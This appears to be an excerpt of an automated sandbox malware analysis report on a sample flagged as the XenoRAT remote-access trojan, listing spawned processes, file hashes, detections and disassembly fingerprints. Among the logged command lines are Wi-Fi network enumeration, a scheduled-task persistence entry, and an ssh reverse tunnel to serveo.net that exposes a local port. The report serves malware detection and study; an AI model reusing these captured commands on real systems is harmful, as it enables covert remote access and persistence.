                                                                                                                                                                                                Imagebase:0x7ff700020000
                                                                                                                                                                                                File size:96'768 bytes
                                                                                                                                                                                                MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:30
                                                                                                                                                                                                Start time:17:27:13
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:findstr "SSID BSSID Signal"
                                                                                                                                                                                                Imagebase:0x7ff75d1e0000
                                                                                                                                                                                                File size:36'352 bytes
                                                                                                                                                                                                MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:31
                                                                                                                                                                                                Start time:17:27:14
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\OpenSSH\ssh.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net
                                                                                                                                                                                                Imagebase:0x7ff7308d0000
                                                                                                                                                                                                File size:946'176 bytes
                                                                                                                                                                                                MD5 hash:C05426E6F6DFB30FB78FBA874A2FF7DC
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:32
                                                                                                                                                                                                Start time:17:27:14
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:36
                                                                                                                                                                                                Start time:17:27:17
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\WerFault.exe -u -p 5500 -s 3644
                                                                                                                                                                                                Imagebase:0x7ff68d3a0000
                                                                                                                                                                                                File size:570'736 bytes
                                                                                                                                                                                                MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:40
                                                                                                                                                                                                Start time:17:28:01
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                                Imagebase:0x19232df0000
                                                                                                                                                                                                File size:9'593'944 bytes
                                                                                                                                                                                                MD5 hash:1BAFB4856A31AE27271FBD2EE1574A4F
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:41
                                                                                                                                                                                                Start time:17:28:02
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\manager.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\manager.exe"
                                                                                                                                                                                                Imagebase:0x240000
                                                                                                                                                                                                File size:52'224 bytes
                                                                                                                                                                                                MD5 hash:DA118F70D089DABFAB1B43B4CD87DB65
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 00000029.00000000.2648249695.0000000000242000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: C:\Users\user\AppData\Roaming\manager.exe, Author: Joe Security
                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                • Detection: 92%, ReversingLabs
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:42
                                                                                                                                                                                                Start time:17:28:02
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\XenoManager\manager.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\XenoManager\manager.exe"
                                                                                                                                                                                                Imagebase:0xf80000
                                                                                                                                                                                                File size:52'224 bytes
                                                                                                                                                                                                MD5 hash:DA118F70D089DABFAB1B43B4CD87DB65
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe, Author: Joe Security
                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                • Detection: 92%, ReversingLabs
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:43
                                                                                                                                                                                                Start time:17:28:07
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\user\AppData\Local\Temp\tmp4A67.tmp" /F
                                                                                                                                                                                                Imagebase:0xbf0000
                                                                                                                                                                                                File size:187'904 bytes
                                                                                                                                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:44
                                                                                                                                                                                                Start time:17:28:07
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:45
                                                                                                                                                                                                Start time:17:28:09
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\XenoManager\manager.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\XenoManager\manager.exe
                                                                                                                                                                                                Imagebase:0x8a0000
                                                                                                                                                                                                File size:52'224 bytes
                                                                                                                                                                                                MD5 hash:DA118F70D089DABFAB1B43B4CD87DB65
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:46
                                                                                                                                                                                                Start time:17:29:00
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                                Imagebase:0x1b2af710000
                                                                                                                                                                                                File size:9'593'944 bytes
                                                                                                                                                                                                MD5 hash:1BAFB4856A31AE27271FBD2EE1574A4F
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:47
                                                                                                                                                                                                Start time:17:30:00
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                                Imagebase:0x28989580000
                                                                                                                                                                                                File size:9'593'944 bytes
                                                                                                                                                                                                MD5 hash:1BAFB4856A31AE27271FBD2EE1574A4F
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:48
                                                                                                                                                                                                Start time:17:31:00
                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                                Imagebase:0x1adb32a0000
                                                                                                                                                                                                File size:9'593'944 bytes
                                                                                                                                                                                                MD5 hash:1BAFB4856A31AE27271FBD2EE1574A4F
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                  Function 00007FF848F02E1C Relevance: 1.8, Strings: 1, Instructions: 589COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: rV_H
                                                                                                                                                                                                  • API String ID: 0-3446107440
                                                                                                                                                                                                  • Opcode ID: f821e59922c464158ee2e61d6d44128b31bac067552e0550f30129d0837fac30
                                                                                                                                                                                                  • Instruction ID: 206fa3d61dacde1c76f0c160fed5b9e393b621ee258827763f16024488894dde
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f821e59922c464158ee2e61d6d44128b31bac067552e0550f30129d0837fac30
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4402E630A1DA8A5FDB96EB7C88556BA3BE1EF5A350F0400B9D44DC71D7EB289C02C751
                                                                                                                                                                                                  Function 00007FF848F0325A Relevance: .9, Instructions: 902COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 48295cde2d7842128c5b63b62df9de84a986d913b70c6a49e74da2a4f24585af
                                                                                                                                                                                                  • Instruction ID: 641ea458fe2175ac0ac9d191e6f664038ecb36f5cceaf0739733af4ae64b09e7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 48295cde2d7842128c5b63b62df9de84a986d913b70c6a49e74da2a4f24585af
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9526C7061C94A9FDB95EF2CC895AB937E1FF5A350F1401B9E44ACB2A6DB24EC02C741
                                                                                                                                                                                                  Function 00007FF848F05453 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: dd435a184e430c87f7e56593d7673e629f76cfff9026f22143c7abae4d2e9a7d
                                                                                                                                                                                                  • Instruction ID: f4f70f298b69e74696ba8636bb602402c4ca410c6097d31ea4afd13a2a3aa79e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: dd435a184e430c87f7e56593d7673e629f76cfff9026f22143c7abae4d2e9a7d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4921D830A0951D9FDBA9EB28C4516E9B3B2EF4B341F5054F9D00DE7292DE7AAD81CB04
                                                                                                                                                                                                  Function 00007FF848F006D1 Relevance: 5.2, Strings: 4, Instructions: 177COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: P_^=$P_^>$P_^?$P_^@
                                                                                                                                                                                                  • API String ID: 0-1157690449
                                                                                                                                                                                                  • Opcode ID: 163f549596c30caa3089183bd2ee984cfdb27a846a6fe7a96a303094f5374a57
                                                                                                                                                                                                  • Instruction ID: 9db265c08d4c7a817652e8ffb586b313e9e938d6e5b6b33a212a37e51d3462aa
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 163f549596c30caa3089183bd2ee984cfdb27a846a6fe7a96a303094f5374a57
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A351F9776191655EE3107B7CB8956DE37A4EF81374F440637D18CCA093DE28648A87A4
                                                                                                                                                                                                  Function 00007FF848F011C0 Relevance: .2, Instructions: 249COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: bd8df9e7828b375d241e0e3cbe5d91e00a1a96fc9854052f7225e84b453586ee
                                                                                                                                                                                                  • Instruction ID: 446af806a34db23319647ec6ba62e2af5fdff7efcad23f98c7a5613076a1d022
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd8df9e7828b375d241e0e3cbe5d91e00a1a96fc9854052f7225e84b453586ee
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B914A70A096199FDB59DFA8C8956EDBBF1FF59310F10007ED00AE7291EB389882CB55
                                                                                                                                                                                                  Function 00007FF848F041AE Relevance: .2, Instructions: 211COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 9b4f875b83120d06ebbb1424798e233f401bac42383d78dbe5c69dc18575e3f2
                                                                                                                                                                                                  • Instruction ID: 409599d635db257414e428d802c90adef2f56a6b52b7003c21ae3fe7b3668c3f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9b4f875b83120d06ebbb1424798e233f401bac42383d78dbe5c69dc18575e3f2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D819E70D0D25A8FD799EF6888552ADBBF0EF56314F0401BEC049DB2D2EB385945CB46
                                                                                                                                                                                                  Function 00007FF848F01B7A Relevance: .2, Instructions: 182COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 29816d2184efbdd708f94ad8529596e3f335c0618f103224e8b80a150e8f5fa1
                                                                                                                                                                                                  • Instruction ID: f587fea96db5636e65eee8ba7e5dcd9908543e4b4e61e774acf469ca18594be8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 29816d2184efbdd708f94ad8529596e3f335c0618f103224e8b80a150e8f5fa1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F4518870D0964D8FEB98EF6898557EDBBF1EF5A340F0400BAD009E7292DB349885CB45
                                                                                                                                                                                                  Function 00007FF848F04FAD Relevance: .2, Instructions: 177COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 848b3873309d37162788fee936c85e5bc4af632f35de032cfed4057d747f0351
                                                                                                                                                                                                  • Instruction ID: 25500c9101eb3ae53ebf9aa89974eb2532cfea5dc847b87a1e973bb6dc8cd5c9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 848b3873309d37162788fee936c85e5bc4af632f35de032cfed4057d747f0351
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE516870A1AA1D8FDB95DB6888947ECBBF1FF5A311F0002AAC00DE72D1DB745985CB42
                                                                                                                                                                                                  Function 00007FF848F04C10 Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 634ef8815c77843abde5c8918bca961c3ab6690f0ade3534b5eb14628c15c8e0
                                                                                                                                                                                                  • Instruction ID: b8269427efe2d4c39d957b0ac232d9fc625f7feba1a1b40523780e5b8b43f912
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 634ef8815c77843abde5c8918bca961c3ab6690f0ade3534b5eb14628c15c8e0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7841C370D19A1D9FDB44EFA8D4986ECBBF1EF29355F001179D009E72A1DB789880CB44
                                                                                                                                                                                                  Function 00007FF848F05026 Relevance: .1, Instructions: 121COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 5afa5f2b176c9c35361b203ec8ef6ca8d76cc1447916066d3fc9d60a4cc7acb9
                                                                                                                                                                                                  • Instruction ID: e68543d9fc9e2483827b4d4e488e3e8cfcf331c333aea27c0c0064755b95df65
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5afa5f2b176c9c35361b203ec8ef6ca8d76cc1447916066d3fc9d60a4cc7acb9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2413871E19A1D8FDB94DB68C894BACBBF1FB5A311F1002AAC00DE72D1DB746981CB41
                                                                                                                                                                                                  Function 00007FF848F042D6 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: f4ce71ed2d953bc221c4b32b168daefb48c2b1af03c9d086790caf98e587d904
                                                                                                                                                                                                  • Instruction ID: b2e419013a9134bf60282b6c6f00aa9ceebf6c721510dcede576cbc727482ea3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f4ce71ed2d953bc221c4b32b168daefb48c2b1af03c9d086790caf98e587d904
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C418E7090A21A8FD769EF6888952FDBBB0EF52314F4045BEC0499B2D2DB345946CB85
                                                                                                                                                                                                  Function 00007FF848F007FA Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 1b71bd3bfdb0bdc758839af3c44957ebe0428a4885af7a22dd3f84ad642e0bdf
                                                                                                                                                                                                  • Instruction ID: 079666fb45c8fb04aa0e40b5e4275588a7a8a5a7969c0382bb6b461a26545b6d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b71bd3bfdb0bdc758839af3c44957ebe0428a4885af7a22dd3f84ad642e0bdf
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA21293770D2699EE311B6ACF8551D937A0EFC1376F000177C288DB093DA24448B83A5
                                                                                                                                                                                                  Function 00007FF848F04C3E Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 1f57b2712964f5208f48f79d027067c9c5c27957681ef4d97c9f4cc0f0ee5d76
                                                                                                                                                                                                  • Instruction ID: 1a44e4c18fc7674299a9b0d02b200761b3db06265bd987a1badea0b4ee04cc24
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f57b2712964f5208f48f79d027067c9c5c27957681ef4d97c9f4cc0f0ee5d76
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4231E970D1965D9FEB95EBA8C4986ECBBF1FF29351F00006AD009E7292DB785484CB05
                                                                                                                                                                                                  Function 00007FF848F0133F Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 973fdd835a1ff5366a8d976589b713eb5f8be6774f96db6d92de6fd0ac06ae17
                                                                                                                                                                                                  • Instruction ID: e75aca18259ad4882827d51dbe2af71f89983f595cda65eed8cd722d19c7c892
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 973fdd835a1ff5366a8d976589b713eb5f8be6774f96db6d92de6fd0ac06ae17
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B21F87090565D9FCB55EFA8C8856EDBBF1FF59301F1041A9D00DEB295DB389885CB40
                                                                                                                                                                                                  Function 00007FF848F01D36 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2106599532.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f00000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: bfe2305689d43523e79f39260b04cf91fd7636aa7ed867c49b597b70d5a7ba0a
                                                                                                                                                                                                  • Instruction ID: 7d9917db9d678000cad6a3ad56d305376dce81dacc0402621484d31e712fe525
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfe2305689d43523e79f39260b04cf91fd7636aa7ed867c49b597b70d5a7ba0a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51F01432E0991D8FDF94EF98D844AECB7B1FB59341F40017AD00DE3251EB34A8818B40
                                                                                                                                                                                                  Function 00007FF848F049D5 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
